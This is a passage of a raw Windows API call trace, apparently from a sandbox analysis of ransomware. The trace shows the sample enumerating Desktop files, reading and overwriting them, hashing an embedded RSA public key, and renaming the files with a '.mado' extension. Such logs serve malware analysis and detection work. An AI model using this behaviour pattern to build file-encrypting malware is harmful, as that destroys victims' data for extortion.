(in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0203.777] CloseHandle (hObject=0x63c) returned 1 [0203.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0203.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b6eb68 [0203.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0203.778] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BdD6 3od3oZknu3ORg1.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bdd6 3od3ozknu3org1.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BdD6 3od3oZknu3ORg1.swf.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bdd6 3od3ozknu3org1.swf.mado")) returned 1 [0203.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb68 | out: hHeap=0x2c0000) returned 1 [0203.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.779] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3219e0 | out: hHeap=0x2c0000) returned 1 [0203.780] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9366cff0, ftCreationTime.dwHighDateTime=0x1d5de7b, ftLastAccessTime.dwLowDateTime=0xcfa54d60, ftLastAccessTime.dwHighDateTime=0x1d5e3f4, ftLastWriteTime.dwLowDateTime=0xcfa54d60, ftLastWriteTime.dwHighDateTime=0x1d5e3f4, nFileSizeHigh=0x0, nFileSizeLow=0x16bd5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="c0a9bFnD.mkv", cAlternateFileName="")) returned 1 [0203.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0203.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0203.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0203.780] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\c0a9bFnD.mkv") returned=".mkv" [0203.780] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\c0a9bFnD.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c0a9bfnd.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0203.780] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=93141) returned 1 [0203.780] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0203.783] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x16baf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.783] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0203.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0203.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.784] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0203.784] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x16bd5, lpOverlapped=0x0) returned 1 [0203.785] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x32eb20 [0203.785] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.785] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.785] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0203.786] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0203.786] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0203.786] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0203.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0203.786] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0203.786] GetLastError () returned 0x0 [0203.786] CryptDestroyHash (hHash=0x32ef238) returned 1 [0203.786] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0203.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0203.786] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0203.786] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0203.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0203.787] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0203.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0203.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16be0) returned 0x3b80690 [0203.788] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0203.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0203.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0203.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0203.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0203.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0203.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6de08 [0203.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fddd0 [0203.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6de50 [0203.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdde8 [0203.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde18 [0203.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde60 [0203.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde30 [0203.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0203.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b67078 [0203.788] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b67078, Size=0x218) returned 0x33109f0 [0203.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b6eb68 [0203.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde18 | out: hHeap=0x2c0000) returned 1 [0203.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde30 | out: hHeap=0x2c0000) returned 1 [0203.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde60 | out: hHeap=0x2c0000) returned 1 [0203.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0203.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb68 | out: hHeap=0x2c0000) returned 1 [0203.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde60 [0203.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0203.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fde30 [0203.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0203.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fde18 [0203.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0203.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b683c0 [0203.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0203.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0203.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0203.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b68078 [0203.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0203.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0203.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b683c0 | out: hHeap=0x2c0000) returned 1 [0203.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde30 | out: hHeap=0x2c0000) returned 1 [0203.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0203.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde18 | out: hHeap=0x2c0000) returned 1 [0203.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0203.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0203.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde60 | out: hHeap=0x2c0000) returned 1 [0203.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0203.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0203.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33109f0 | out: hHeap=0x2c0000) returned 1 [0203.789] GetCurrentThreadId () returned 0x600 [0203.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bb80 [0203.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x323a60 [0203.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0203.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0203.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0203.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0203.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0203.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bd90 [0203.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.790] GetCurrentThreadId () returned 0x600 [0203.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0203.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0203.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bfa0 [0203.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0203.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0203.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0203.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bc88 [0203.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde60 [0203.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0203.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0203.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0203.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0203.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0203.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0203.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde18 [0203.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0203.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0203.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0203.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0203.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0203.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde30 [0203.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0203.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0203.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0203.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde00 [0203.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0203.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde78 [0203.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0203.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0203.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde48 [0203.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde90 [0203.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0203.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0203.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0203.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0203.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0203.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0203.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde18 | out: hHeap=0x2c0000) returned 1 [0203.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde18 [0203.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0203.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0203.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde60 | out: hHeap=0x2c0000) returned 1 [0203.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b683c0 [0203.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde90 | out: hHeap=0x2c0000) returned 1 [0203.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x33109f0 [0203.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0203.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b68190 [0203.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0203.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b682a8 [0203.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde18 | out: hHeap=0x2c0000) returned 1 [0203.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3310c08 [0203.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b683c0 | out: hHeap=0x2c0000) returned 1 [0203.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6be98 [0203.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0203.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3219e0 | out: hHeap=0x2c0000) returned 1 [0203.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bfa0 | out: hHeap=0x2c0000) returned 1 [0203.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6be98 | out: hHeap=0x2c0000) returned 1 [0203.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0203.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b682a8 | out: hHeap=0x2c0000) returned 1 [0203.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33109f0 | out: hHeap=0x2c0000) returned 1 [0203.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310c08 | out: hHeap=0x2c0000) returned 1 [0203.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68190 | out: hHeap=0x2c0000) returned 1 [0203.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0203.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde48 | out: hHeap=0x2c0000) returned 1 [0203.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0203.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde78 | out: hHeap=0x2c0000) returned 1 [0203.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0203.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde30 | out: hHeap=0x2c0000) returned 1 [0203.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde00 | out: hHeap=0x2c0000) returned 1 [0203.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0203.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0203.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bd90 | out: hHeap=0x2c0000) returned 1 [0203.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdde8 | out: hHeap=0x2c0000) returned 1 [0203.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6de50 | out: hHeap=0x2c0000) returned 1 [0203.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0203.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc88 | out: hHeap=0x2c0000) returned 1 [0203.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0203.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68078 | out: hHeap=0x2c0000) returned 1 [0203.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0203.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0203.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0203.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0203.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0203.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0203.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0203.793] WriteFile (in: hFile=0x63c, lpBuffer=0x3b80690*, nNumberOfBytesToWrite=0x16bd0, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b80690*, lpNumberOfBytesWritten=0x39cfb14*=0x16bd0, lpOverlapped=0x0) returned 1 [0203.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80690 | out: hHeap=0x2c0000) returned 1 [0203.794] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x16bd5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.794] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6bb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, 